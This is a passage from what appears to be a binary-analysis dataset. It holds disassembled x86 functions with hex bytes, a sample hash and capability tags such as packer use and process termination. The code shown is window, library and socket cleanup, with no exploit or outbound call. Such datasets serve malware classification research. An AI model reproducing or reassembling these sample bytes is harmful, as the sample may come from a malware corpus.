"mov ecx, dword [ebx + 0x14]",
"lea esi, [esi + eax + 4]",
"add esp, 4",
"mov eax, dword [esi]",
"test ch, 0x80",
"mov dword [esp + 0x98], eax",
"je 0x42aa97",
"push ebp",
"lea ecx, [esp + 0x38]",
"call fcn.00413630",
"jmp 0x42aace",
"mov ecx, dword [esp + 0xec]",
"test ecx, ecx",
"je 0x42aab3",
"test edi, edi",
"jne 0x42aab3",
"push 1",
"lea ecx, [esp + 0x38]",
"call fcn.00413630",
"jmp 0x42aace",
"and al, 1",
"lea ecx, [esp + 0x34]",
"push eax",
"call fcn.00413630",
"test byte [esp + 0x98], 2",
"je 0x42aace",
"mov ebp, 0x8000000",
"test byte [esp + 0x98], 4",
"je 0x42aade",
"or ebp, 0x10000",
"test edi, edi",
"jne 0x42ab8f",
"mov eax, dword [esp + 0xf4]",
"mov ecx, dword [esp + 0x4c]",
"mov edx, dword [esp + 0xac]",
"push edi",
"mov ebx, dword [esp + 0x14]",
"push edi",
"mov edi, dword [esp + 0xb8]",
"mov dword [0x517714], eax",
"mov eax, dword [esp + 0xa8]",
"push edi",
"push ecx",
"mov ecx, dword [esp + 0xb4]",
"push edx",
"mov edx, dword [esp + 0xa8]",
"push eax",
"mov eax, dword [esp + 0x110]",
"push ecx",
"mov ecx, dword [esp + 0xac]",
"push edx",
"mov edx, dword [esp + 0xc8]",
"push ebx",
"push 0",
"push eax",
"push ebp",
"push ecx",
"push edx",
"call dword [esp + 0x5c]",
"mov esi, eax",
"xor ebp, ebp",
"cmp esi, ebp",
"mov dword [0x517714], ebp",
"mov dword [esp + 0x18], esi",
"je 0x42acb5",
"mov eax, dword [esi + 0x1c]",
"cmp eax, ebp",
"mov dword [esp + 0x9c], eax",
"je 0x42acb5",
"push eax",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42acb5",
"mov eax, dword [esp + 0xec]",
"mov dword [esp + 0x10], ebp",
"mov dword [esi + 0xd8], eax",
"jmp 0x42abed",
"mov edi, dword [esp + 0xb0]",
"mov ecx, dword [esp + 0x4c]",
"mov edx, dword [esp + 0xac]",
"mov eax, dword [esp + 0xa0]",
"push 0",
"mov ebx, dword [esp + 0x30]",
"push 0",
"push edi",
"push ecx",
"mov ecx, dword [esp + 0xb4]",
"push edx",
"mov edx, dword [esp + 0xa8]",
"push eax",
"mov eax, dword [esp + 0x30]",
"push ecx",
"push edx",
"mov ecx, dword [eax + 0x1c]",
"mov edx, dword [esp + 0xb0]",
"mov eax, dword [esp + 0xc8]",
"push 0",
"push ebx",
"push ecx",
"push ebp",
"push edx",
"push eax",
"call dword [esp + 0x5c]",
"add ebx, 0xa",
"mov esi, eax",
"mov dword [esp + 0x2c], ebx",
"test esi, esi",
"je 0x42acda",
"mov ecx, dword [esp + 0x48]",
"push edi",
"mov dword [ecx], esi",
"lea ecx, [esp + 0x58]",
"call fcn.004135b0",
"push esi",
"lea ecx, [esp + 0x80]",
"call fcn.004135b0",
"mov eax, dword [esp + 0x1c]",
"mov esi, dword [esp + 0x30]",
"dec eax",
"mov dword [esp + 0x1c], eax",
"mov ebx, eax",
"test ebx, ebx",
"jg 0x42a96b",
"mov eax, dword [esp + 0x78]",
"mov esi, dword [esp + 0x70]",
"neg eax",
"sbb eax, eax",
"mov ecx, dword [esp + 0x5c]",
"and eax, esi",
"mov ebx, dword [esp + 0x84]",
"mov dword [esp + 0x48], eax",
"mov eax, dword [esp + 0x64]",
"mov edi, eax",
"mov edx, dword [esp + 0x3c]",
"neg edi",
"sbb edi, edi",
"mov esi, dword [esp + 0x14]",
"and edi, ecx",
"mov ecx, dword [esp + 0x8c]",
"neg ecx",
"sbb ecx, ecx",
"and ecx, ebx",
"mov ebx, 1",
"mov dword [esp + 0x20], ecx",
"mov ecx, dword [esp + 0x44]",
"neg ecx",
"sbb ecx, ecx",
"mov dword [esp + 0x10], ebx",
"and ecx, edx",
"shr eax, 2",
"mov dword [esp + 0x24], ecx",
"mov dword [esp + 0x1c], eax",
"push 0",
"push ebx",
"mov ecx, esi",
"call fcn.00427790",
"mov ebp, eax",
"test ebp, ebp",
"je 0x42ae52",
"push ebx",
"mov ecx, esi",
"call fcn.00427fc0",
"cmp eax, 1",
"jne 0x42ad72",
"inc ebx",
"mov dword [esp + 0x10], ebx",
"jmp 0x42ac89",
"mov eax, dword [esp + 0x28]",
"cmp eax, ebp",
"je 0x42acc4",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyAcceleratorTable]",
"cmp ebx, ebp",
"je 0x42accf",
"push ebx",
"call dword [sym.imp.USER32.dll_DestroyMenu]",
"mov ecx, dword [esp + 0x20]",
"mov edx, dword [ecx]",
"call dword [edx + 8]",
"jmp 0x42ad01",
"mov eax, dword [esp + 0x28]",
"test eax, eax",
"je 0x42ace9",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyAcceleratorTable]",
"mov eax, dword [esp + 0x10]",
"test eax, eax",
"je 0x42acf8",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyMenu]",
"mov ecx, dword [esp + 0x20]",
"mov eax, dword [ecx]",
"call dword [eax + 8]",
"mov esi, 0x4dcfa8",
"lea ecx, [esp + 0x34]",
"mov dword [esp + 0x34], esi",
"call fcn.00413520",
"lea ecx, [esp + 0x68]",
"mov dword [esp + 0x68], esi",
"call fcn.00413520",
"lea ecx, [esp + 0x7c]",
"mov dword [esp + 0x7c], esi",
"call fcn.00413520",
"lea ecx, [esp + 0x54]",
"mov dword [esp + 0x54], esi",
"call fcn.00413520",
"pop edi",
"pop esi",
"pop ebp",
"xor eax, eax",
"pop ebx",
"add esp, 0xd4",
"ret 0x14",
"mov eax, dword [esp + 0x28]",
"test eax, eax",
"je 0x42ad58",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyAcceleratorTable]",
"mov eax, dword [esp + 0x10]",
"test eax, eax",
"je 0x42ad67",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyMenu]",
"mov ecx, dword [esp + 0x20]",
"mov edx, dword [ecx]",
"call dword [edx + 8]",
"jmp 0x42ad01",
"mov eax, dword [esp + 0x10]",
"mov ecx, dword [esp + 0x14]",
"push eax",
"call fcn.004277e0",
"push eax",
"mov ecx, dword [esp + 0x20]",
"push ecx",
"push edi",
"call fcn.00413d40",
"mov edx, dword [esp + 0x2c]",
"mov ebx, eax",
"lea esi, [ebp + 0x18]",
"mov eax, dword [edx + ebx*4]",
"push esi",
"mov dword [esp + 0x40], eax",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"lea esi, [eax + esi + 0x18]",
"add esp, 0x14",
"mov eax, dword [esi]",
"test eax, eax",
"je 0x42adcf",
"mov ecx, dword [esp + 0x1c]",
"push eax",
"push ecx",
"push edi",
"call fcn.00413d40",
"mov edx, dword [esp + 0x2c]",
"add esp, 0xc",
"mov eax, dword [edx + eax*4]",
"jmp 0x42add3",
"mov eax, dword [esp + 0x18]",
"test eax, eax",
"je 0x42adda",
"mov eax, dword [eax + 0x1c]",
"push eax",
"mov eax, dword [esp + 0x34]",
"mov ecx, dword [eax + 0x1c]",
"push ecx",
"call dword [sym.imp.USER32.dll_SetParent]",
"push eax",
"call fcn.004ae4cd",
"mov edx, dword [esp + 0x48]",
"cmp dword [edx + ebx*4], 0",
"je 0x42ae3e",
"mov eax, dword [esi + 4]",
"add esi, 4",
"add esi, 4",
"test eax, eax",
"jle 0x42ae3e",
"cmp dword [esi], 0",
"je 0x42ae15",
"dec eax",
"add esi, 4",
"test eax, eax",
"jg 0x42ae06",
"jmp 0x42ae3e",
"test eax, eax",
"jle 0x42ae3e",
"mov ebx, dword [esp + 0x24]",
"mov ebp, eax",
"mov eax, dword [esi]",
"test eax, eax",
"je 0x42ae38",
"push eax",
"mov eax, dword [esp + 0x20]",
"push eax",
"push edi",
"call fcn.00413d40",
"add esp, 0xc",
"mov byte [eax + ebx], 0",
"add esi, 4",
"dec ebp",
"jne 0x42ae1f",
"mov eax, dword [esp + 0x10]",
"mov esi, dword [esp + 0x14]",
"inc eax",
"mov dword [esp + 0x10], eax",
"mov ebx, eax",
"jmp 0x42ac89",
"mov ebx, 1",
"mov dword [esp + 0x10], ebx",
"push 0",
"push ebx",
"mov ecx, esi",
"call fcn.00427790",
"mov edi, eax",
"test edi, edi",
"je 0x42af58",
"push ebx",
"mov ecx, esi",
"call fcn.00427fc0",
"cmp eax, 1",
"jne 0x42ae7f",
"inc ebx",
"jmp 0x42ae57",
"add edi, 0x18",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"mov edx, dword [esp + 0x18]",
"mov ecx, dword [eax + edi]",
"mov ebp, dword [eax + edi + 0x18]",
"add eax, edi",
"mov eax, edx",
"add esp, 8",
"cmp eax, 2",
"mov dword [esp + 0x2c], ecx",
"lea ebx, [edx - 1]",
"jl 0x42aee7",
"push 0",
"push ebx",
"mov ecx, esi",
"call fcn.00427790",
"push ebx",
"mov ecx, esi",
"mov edi, eax",
"call fcn.00427fc0",
"test eax, eax",
"jne 0x42aee1",
"add edi, 0x18",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"add esp, 8",
"cmp dword [edi + 0x18], ebp",
"je 0x42af11",
"dec ebx",
"cmp ebx, 1",
"jge 0x42aeae",
"mov eax, dword [esp + 0x2c]",
"push 0x13",
"push 0",
"push 0",
"mov ecx, dword [eax + 0x1c]",
"push 0",
"push 0",
"push 0",
"push ecx",
"call dword [sym.imp.USER32.dll_SetWindowPos]",
"mov eax, dword [esp + 0x10]",
"inc eax",
"mov dword [esp + 0x10], eax",
"mov ebx, eax",
"jmp 0x42ae5b",
"cmp ebx, 1",
"jl 0x42aee7",
"push 0",
"push ebx",
"mov ecx, esi",
"call fcn.00427790",
"test eax, eax",
"je 0x42af01",
"lea edi, [eax + 0x18]",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"add esp, 8",
"mov edi, dword [edi]",
"test edi, edi",
"je 0x42af01",
"mov ecx, dword [esp + 0x2c]",
"mov eax, dword [edi + 0x1c]",
"push 0x13",
"push 0",
"mov edx, dword [ecx + 0x1c]",
"push 0",
"push 0",
"push 0",
"push eax",
"push edx",
"jmp 0x42aefb",
"xor esi, esi",
"mov ebx, dword [esp + 0x14]",
"mov eax, esi",
"push 0",
"push eax",
"mov ecx, ebx",
"inc esi",
"call fcn.00427790",
"mov edi, eax",
"test edi, edi",
"je 0x42afd7",
"lea edx, [esi - 1]",
"mov ecx, ebx",
"push edx",
"call fcn.00427fc0",
"cmp eax, 1",
"je 0x42af5a",
"lea ebx, [edi + 0x18]",
"mov edi, ebx",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"mov ecx, dword [edi + eax + 0x1c]",
"lea eax, [edi + eax + 0x1c]",
"mov edi, ebx",
"push edi",
"lea ebp, [eax + ecx*4 + 4]",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"lea edi, [eax + edi + 0x14]",
"mov eax, dword [ebp]",
"add esp, 0x10",
"test eax, eax",
"jle 0x42afcf",
"add ebp, 4",
"push eax",
"push ebp",
"call fcn.00436180",
"add esp, 8",
"mov dword [edi], eax",
"jmp 0x42af5a",
"mov dword [edi], 0",
"jmp 0x42af5a",
"mov edx, dword [esp + 0xe8]",
"mov ebx, dword [edx + 0x18]",
"dec ebx",
"js 0x42b04d",
"lea esi, [ebx + 1]",
"xor ebp, ebp",
"mov ecx, dword [esp + 0x14]",
"mov eax, ebx",
"push ebp",
"dec ebx",
"push eax",
"dec esi",
"call fcn.00427790",
"mov edi, eax",
"cmp edi, ebp",
"je 0x42b04f",
"mov ecx, dword [esp + 0x14]",
"push esi",
"call fcn.00427fc0",
"test eax, eax",
"jne 0x42b047",
"add edi, 0x18",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"add esp, 8",
"mov edi, dword [edi]",
"cmp edi, ebp",
"je 0x42b047",
"mov eax, dword [edi + 0x1c]",
"push eax",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42b047",
"mov ecx, dword [edi + 0x1c]",
"push ebp",
"push ebp",
"push 0x806f",
"push ecx",
"call dword [sym.imp.USER32.dll_SendMessageA]",
"cmp ebx, ebp",
"jge 0x42afe9",
"jmp 0x42b04f",
"xor ebp, ebp",
"mov edx, dword [esp + 0x18]",
"push ebp",
"push ebp",
"push 0x8004",
"mov eax, dword [edx + 0x1c]",
"push eax",
"call dword [sym.imp.USER32.dll_SendMessageA]",
"mov edi, 1",
"mov esi, dword [esp + 0x1c]",
"cmp esi, edi",
"jle 0x42b09d",
"mov ecx, dword [esp + 0x20]",
"mov ebp, dword [esp + 0x24]",
"lea ebx, [ecx + 4]",
"mov dl, byte [edi + ebp]",
"mov ecx, dword [ebx]",
"dec dl",
"neg dl",
"sbb edx, edx",
"and edx, 0xfffffff8",
"add edx, 8",
"push edx",
"call fcn.004b0ea1",
"inc edi",
"add ebx, 4",
"cmp edi, esi",
"jl 0x42b07c",
"xor ebp, ebp",
"mov eax, dword [esp + 0x18]",
"mov eax, dword [eax + 0x1dc]",
"cmp eax, ebp",
"je 0x42b0b2",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyAcceleratorTable]",
"mov edx, dword [esp + 0x18]",
"mov ecx, dword [esp + 0x28]",
"push ebp",
"push ebp",
"push 0x7da",
"mov dword [edx + 0x1dc], ecx",
"call fcn.0042cd80",
"push ebp",
"mov ecx, dword [esp + 0x18]",
"call fcn.004277e0",
"mov edi, eax",
"lea eax, [esp + 0xb8]",
"mov esi, dword [esp + 0x4c]",
"push ebp",
"push eax",
"push 0x7d8",
"mov dword [esp + 0xc4], esi",
"mov dword [esp + 0xc8], edi",
"mov dword [esp + 0xcc], ebp",
"mov dword [esp + 0xd0], ebp",
"mov dword [esp + 0xe8], ebp",
"mov dword [esp + 0xec], ebp",
"call fcn.0042cd80",
"mov ebx, dword [esp + 0x9c]",
"push ebx",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42b380",
"lea ecx, [esp + 0xb8]",
"push ebp",
"push ecx",
"push 0x7d8",
"mov dword [esp + 0xc4], esi",
"mov dword [esp + 0xc8], edi",
"mov dword [esp + 0xcc], 3",
"mov dword [esp + 0xd0], ebp",
"mov dword [esp + 0xe8], ebp",
"mov dword [esp + 0xec], ebp",
"call fcn.0042cd80",
"push ebx",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42b380",
"lea edx, [esp + 0xb8]",
"push ebp",
"push edx",
"push 0x7d8",
"mov dword [esp + 0xc4], esi",
"mov dword [esp + 0xc8], edi",
"mov dword [esp + 0xcc], 4",
"mov dword [esp + 0xd0], ebp",
"mov dword [esp + 0xe8], ebp",
"mov dword [esp + 0xec], ebp",
"call fcn.0042cd80",
"push ebx",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42b380",
"mov eax, dword [esp + 0x44]",
"mov edx, dword [esp + 0x3c]",
"neg eax",
"sbb eax, eax",
"and eax, edx",
"cmp byte [eax], 0",
"je 0x42b1fd",
"mov eax, dword [esp + 0xec]",
"mov ecx, dword [esp + 0xe8]",
"push eax",
"push ecx",
"push esi",
"mov ecx, 0x517300",
"call fcn.0042a690",
"push ebx",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42b2d0",
"mov ecx, dword [esp + 0xf4]",
"mov eax, 1",
"cmp ecx, eax",
"jne 0x42b2d0",
"mov edx, dword [esp + 0x18]",
"xor esi, esi",
"mov dword [edx + 0x1bc], eax",
"lea ecx, [esp + 0x30]",
"mov eax, esi",
"push ecx",
"mov ecx, dword [esp + 0x54]",
"push eax",
"inc esi",
"call fcn.00427da0",
"test eax, eax",
"je 0x42b2d0",
"mov eax, dword [esp + 0x30]",
"mov ecx, dword [esp + 0xe8]",
"cmp eax, ecx",
"je 0x42b22c",
"push ebp",
"push ebp",
"lea ecx, [eax + 0x14]",
"call fcn.00427790",
"mov edi, eax",
"add edi, 0x18",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"add esp, 8",
"mov edi, dword [edi]",
"cmp edi, ebp",
"je 0x42b22c",
"mov edx, dword [edi + 0x1c]",
"push edx",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42b22c",
"mov eax, dword [edi + 0x1c]",
"push eax",
"call dword [sym.imp.USER32.dll_GetParent]",
"push eax",
"call fcn.004ae4cd",
"test eax, eax",
"jne 0x42b22c",
"mov ecx, dword [esp + 0x18]",
"mov edx, dword [edi + 0x1c]",
"push edx",
"lea ebx, [ecx + 0x1c0]",
"mov ecx, ebx",
"call fcn.004135b0",
"mov ecx, edi",
"call fcn.004b0ec8",
"push eax",
"mov ecx, ebx",
"call fcn.004135b0",
"push ebp",
"mov ecx, edi",
"call fcn.004b0ee3",
"jmp 0x42b22c",
"call dword [sym.imp.USER32.dll_GetFocus]",
"mov esi, eax",
"mov eax, dword [esp + 0xe8]",
"mov dword [esp + 0x50], esi",
"mov ebx, dword [eax + 0x18]",
"dec ebx",
"js 0x42b352",
"lea esi, [ebx + 1]",
"mov ecx, dword [esp + 0x14]",
"mov eax, ebx",
"push ebp",
"dec ebx",
"push eax",
"dec esi",
"call fcn.00427790",
"mov edi, eax",
"cmp edi, ebp",
"je 0x42b34e",
"mov ecx, dword [esp + 0x14]",
"push esi",
"call fcn.00427fc0",
"test eax, eax",
"jne 0x42b34a",
"add edi, 0x18",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"push edi",
"call fcn.00413d00",
"add edi, eax",
"add esp, 8",
"mov edi, dword [edi]",
"cmp edi, ebp",
"je 0x42b34a",
"mov ecx, dword [edi + 0x1c]",
"push ecx",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42b34a",
"mov edx, dword [edi + 0x1c]",
"push ebp",
"push ebp",
"push 0x8076",
"push edx",
"call dword [sym.imp.USER32.dll_SendMessageA]",
"cmp ebx, ebp",
"jge 0x42b2ec",
"mov esi, dword [esp + 0x50]",
"cmp esi, ebp",
"je 0x42b372",
"push esi",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42b372",
"call dword [sym.imp.USER32.dll_GetFocus]",
"cmp eax, esi",
"je 0x42b372",
"push esi",
"call dword [sym.imp.USER32.dll_SetFocus]",
"mov eax, dword [esp + 0x18]",
"mov dword [eax + 0x1b8], 1",
"mov esi, 0x4dcfa8",
"lea ecx, [esp + 0x34]",
"mov dword [esp + 0x34], esi",
"call fcn.00413520",
"lea ecx, [esp + 0x68]",
"mov dword [esp + 0x68], esi",
"call fcn.00413520",
"lea ecx, [esp + 0x7c]",
"mov dword [esp + 0x7c], esi",
"call fcn.00413520",
"lea ecx, [esp + 0x54]",
"mov dword [esp + 0x54], esi",
"call fcn.00413520",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 0xd4",
"ret 0x14"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x42c950
|
[
"Packed with generic packer",
"Terminate process"
] |
558bec5153568bf1578975fc8b8ee00100008b86340200004185c0898ee00100007459ff152cf34b003b8634020000744b8b86f00300008b7d0885c0742050ff154cf64b0085c074158b86f00300006a005768e783000050ff1558f64b008b862804000085c00f851203000057ff1530f34b008bcec7862804000001000000e803edffff8b96040100008d8e04010000ff52088b861c04000085c07432a05cb25000a80175120c01a25cb250008b861c040000a358b2500060ff1558b25000618b4dfc8bf1c7811c040000000000008b9e3001000033ffc1eb0285db7e238b96280100008b04ba85c074118b8e3c0100006a008b14b9526a06ff5078473bfb7cdd8d8e34010000e8bb6afeff8d8e20010000e8b06afeff8b9e80010000c1eb0285db7e4b33ff85db7e198b86780100008b04b885c0740750ff156cf34b00473bfb7ce78d8e70010000e8796afeff8d8e84010000e86e6afeff8d8e48010000e8636afeff8d8e5c010000e8586afeff8b9ebc010000c1eb0285db7e3533ff85db7e158b8eb40100008b14b952ff156cf34b00473bfb7ceb8d8eac010000e8256afeff6aff6a008d8ec0010000e8cbf007008bcee85ff2ffff8d8edc010000e863ff07008d8e98010000e8f969feff8b862004000033db3bc3740d50ff15d0f54b00899e200400008b86240400003bc3740d50ff15d0f54b00899e240400008b86f00300003bc3742a50ff154cf64b0085c0741f53e8e918080085c0740f8b86d40300008d8ed4030000ff5058899ef00300008bcee84ed9ffff8b86b803000033ff3bc38945087e1b8b8eb40300008b0cb93bcb74098b116a01ff128b4508473bf87ce56aff538d8eb0030000e8d1f207006a018bcee82d200000399e70020000750433c9eb068b8e680200008b8670020000c1e8023bc37e56894d088945fc8b393bfb74388b470c891f3bc3895f04895f08895f14740a50ff15d0f54b00895f0c8b47103bc3740c50e837fc070083c404895f1057e82bfc070083c4048b4d088b45fc83c10448894d088945fc75b08d8e60020000e8cd68feff83beac03000001750cff154cf74b00899eac0300008b9ef800000033ff85db7e228b86f40000008b96e00000006a008b0cb88b04ba51508bcee89ff8ffff473bfb7cde6aff6a008d8edc000000e830ef07006aff6a008d8ef0000000e821ef07008b861004000085c07410ff15a8f74b00c78610040000000000005f5e5b8be55dc20400
|
[
"push ebp",
"mov ebp, esp",
"push ecx",
"push ebx",
"push esi",
"mov esi, ecx",
"push edi",
"mov dword [ebp - 4], esi",
"mov ecx, dword [esi + 0x1e0]",
"mov eax, dword [esi + 0x234]",
"inc ecx",
"test eax, eax",
"mov dword [esi + 0x1e0], ecx",
"je 0x42c9cc",
"call dword [sym.imp.KERNEL32.dll_GetCurrentThreadId]",
"cmp eax, dword [esi + 0x234]",
"je 0x42c9cc",
"mov eax, dword [esi + 0x3f0]",
"mov edi, dword [ebp + 8]",
"test eax, eax",
"je 0x42c9ae",
"push eax",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42c9ae",
"mov eax, dword [esi + 0x3f0]",
"push 0",
"push edi",
"push 0x83e7",
"push eax",
"call dword [sym.imp.USER32.dll_SendMessageA]",
"mov eax, dword [esi + 0x428]",
"test eax, eax",
"jne 0x42ccce",
"push edi",
"call dword [sym.imp.KERNEL32.dll_ExitProcess]",
"mov ecx, esi",
"mov dword [esi + 0x428], 1",
"call fcn.0042b6e0",
"mov edx, dword [esi + 0x104]",
"lea ecx, [esi + 0x104]",
"call dword [edx + 8]",
"mov eax, dword [esi + 0x41c]",
"test eax, eax",
"je 0x42ca28",
"mov al, byte [0x50b25c]",
"test al, 1",
"jne 0x42ca11",
"or al, 1",
"mov byte [0x50b25c], al",
"mov eax, dword [esi + 0x41c]",
"mov dword [0x50b258], eax",
"pushal",
"call dword [0x50b258]",
"popal",
"mov ecx, dword [ebp - 4]",
"mov esi, ecx",
"mov dword [ecx + 0x41c], 0",
"mov ebx, dword [esi + 0x130]",
"xor edi, edi",
"shr ebx, 2",
"test ebx, ebx",
"jle 0x42ca5a",
"mov edx, dword [esi + 0x128]",
"mov eax, dword [edx + edi*4]",
"test eax, eax",
"je 0x42ca55",
"mov ecx, dword [esi + 0x13c]",
"push 0",
"mov edx, dword [ecx + edi*4]",
"push edx",
"push 6",
"call dword [eax + 0x78]",
"inc edi",
"cmp edi, ebx",
"jl 0x42ca37",
"lea ecx, [esi + 0x134]",
"call fcn.00413520",
"lea ecx, [esi + 0x120]",
"call fcn.00413520",
"mov ebx, dword [esi + 0x180]",
"shr ebx, 2",
"test ebx, ebx",
"jle 0x42cac8",
"xor edi, edi",
"test ebx, ebx",
"jle 0x42ca9c",
"mov eax, dword [esi + 0x178]",
"mov eax, dword [eax + edi*4]",
"test eax, eax",
"je 0x42ca97",
"push eax",
"call dword [sym.imp.KERNEL32.dll_FreeLibrary]",
"inc edi",
"cmp edi, ebx",
"jl 0x42ca83",
"lea ecx, [esi + 0x170]",
"call fcn.00413520",
"lea ecx, [esi + 0x184]",
"call fcn.00413520",
"lea ecx, [esi + 0x148]",
"call fcn.00413520",
"lea ecx, [esi + 0x15c]",
"call fcn.00413520",
"mov ebx, dword [esi + 0x1bc]",
"shr ebx, 2",
"test ebx, ebx",
"jle 0x42cb0a",
"xor edi, edi",
"test ebx, ebx",
"jle 0x42caf0",
"mov ecx, dword [esi + 0x1b4]",
"mov edx, dword [ecx + edi*4]",
"push edx",
"call dword [sym.imp.KERNEL32.dll_FreeLibrary]",
"inc edi",
"cmp edi, ebx",
"jl 0x42cadb",
"lea ecx, [esi + 0x1ac]",
"call fcn.00413520",
"push 0xffffffffffffffff",
"push 0",
"lea ecx, [esi + 0x1c0]",
"call fcn.004abbd5",
"mov ecx, esi",
"call fcn.0042bd70",
"lea ecx, [esi + 0x1dc]",
"call fcn.004aca7f",
"lea ecx, [esi + 0x198]",
"call fcn.00413520",
"mov eax, dword [esi + 0x420]",
"xor ebx, ebx",
"cmp eax, ebx",
"je 0x42cb40",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyIcon]",
"mov dword [esi + 0x420], ebx",
"mov eax, dword [esi + 0x424]",
"cmp eax, ebx",
"je 0x42cb57",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyIcon]",
"mov dword [esi + 0x424], ebx",
"mov eax, dword [esi + 0x3f0]",
"cmp eax, ebx",
"je 0x42cb8b",
"push eax",
"call dword [sym.imp.USER32.dll_IsWindow]",
"test eax, eax",
"je 0x42cb8b",
"push ebx",
"call fcn.004ae45b",
"test eax, eax",
"je 0x42cb85",
"mov eax, dword [esi + 0x3d4]",
"lea ecx, [esi + 0x3d4]",
"call dword [eax + 0x58]",
"mov dword [esi + 0x3f0], ebx",
"mov ecx, esi",
"call fcn.0042a4e0",
"mov eax, dword [esi + 0x3b8]",
"xor edi, edi",
"cmp eax, ebx",
"mov dword [ebp + 8], eax",
"jle 0x42cbbc",
"mov ecx, dword [esi + 0x3b4]",
"mov ecx, dword [ecx + edi*4]",
"cmp ecx, ebx",
"je 0x42cbb7",
"mov edx, dword [ecx]",
"push 1",
"call dword [edx]",
"mov eax, dword [ebp + 8]",
"inc edi",
"cmp edi, eax",
"jl 0x42cba1",
"push 0xffffffffffffffff",
"push ebx",
"lea ecx, [esi + 0x3b0]",
"call fcn.004abe9b",
"push 1",
"mov ecx, esi",
"call fcn.0042ec00",
"cmp dword [esi + 0x270], ebx",
"jne 0x42cbdf",
"xor ecx, ecx",
"jmp 0x42cbe5",
"mov ecx, dword [esi + 0x268]",
"mov eax, dword [esi + 0x270]",
"shr eax, 2",
"cmp eax, ebx",
"jle 0x42cc48",
"mov dword [ebp + 8], ecx",
"mov dword [ebp - 4], eax",
"mov edi, dword [ecx]",
"cmp edi, ebx",
"je 0x42cc36",
"mov eax, dword [edi + 0xc]",
"mov dword [edi], ebx",
"cmp eax, ebx",
"mov dword [edi + 4], ebx",
"mov dword [edi + 8], ebx",
"mov dword [edi + 0x14], ebx",
"je 0x42cc1a",
"push eax",
"call dword [sym.imp.USER32.dll_DestroyIcon]",
"mov dword [edi + 0xc], ebx",
"mov eax, dword [edi + 0x10]",
"cmp eax, ebx",
"je 0x42cc2d",
"push eax",
"call fcn.004ac85e",
"add esp, 4",
"mov dword [edi + 0x10], ebx",
"push edi",
"call fcn.004ac85e",
"add esp, 4",
"mov ecx, dword [ebp + 8]",
"mov eax, dword [ebp - 4]",
"add ecx, 4",
"dec eax",
"mov dword [ebp + 8], ecx",
"mov dword [ebp - 4], eax",
"jne 0x42cbf8",
"lea ecx, [esi + 0x260]",
"call fcn.00413520",
"cmp dword [esi + 0x3ac], 1",
"jne 0x42cc68",
"call dword [sym.imp.WS2_32.dll_WSACleanup]",
"mov dword [esi + 0x3ac], ebx",
"mov ebx, dword [esi + 0xf8]",
"xor edi, edi",
"test ebx, ebx",
"jle 0x42cc96",
"mov eax, dword [esi + 0xf4]",
"mov edx, dword [esi + 0xe0]",
"push 0",
"mov ecx, dword [eax + edi*4]",
"mov eax, dword [edx + edi*4]",
"push ecx",
"push eax",
"mov ecx, esi",
"call fcn.0042c530",
"inc edi",
"cmp edi, ebx",
"jl 0x42cc74",
"push 0xffffffffffffffff",
"push 0",
"lea ecx, [esi + 0xdc]",
"call fcn.004abbd5",
"push 0xffffffffffffffff",
"push 0",
"lea ecx, [esi + 0xf0]",
"call fcn.004abbd5",
"mov eax, dword [esi + 0x410]",
"test eax, eax",
"je 0x42ccce",
"call dword [sym.imp.ole32.dll_OleUninitialize]",
"mov dword [esi + 0x410], 0",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret 4"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x42cee0
|
[
"Access peb ldr_data"
] |
6aff68389b4b0064a100000000506489250000000083ec3055578bf933ed8b4c24488d4424485550518d8f04010000897c2414896c2418896c241ce8c0aeffff85c07528556884904f008bcfe82ff2ffff8b44240c8b5424105f5d8b4c243064890d0000000083c43cc210008b542448538b5c2450565555538d4a14e8afa8ffff8d4c242c8bf0e8b463feff53896c244ce81ab0ffff83c40485c0747283c61856e87a6dfeff03f056e8726dfeff8b4c246083c40883f9038d4406080f8750030000ff248d30d3420083c00450e81ebbffff83c40489442414e9380300008b00c1e80283e00189442414e9270300008b00d1e883e00189442414e9170300008b00f7d083e00189442414e9070300008b0655508bcfe8a6f2ffff8b5c24588be88d7e188b55288d0c9b8bf78d048a568944245ce8e86cfeff03f056e8e06cfeff03f083c4088b3685f674158b4e1c51ff154cf64b0085c07407b801000000eb0233c083fb080f8d5c02000083fb070f879e020000ff249d40d3420083f80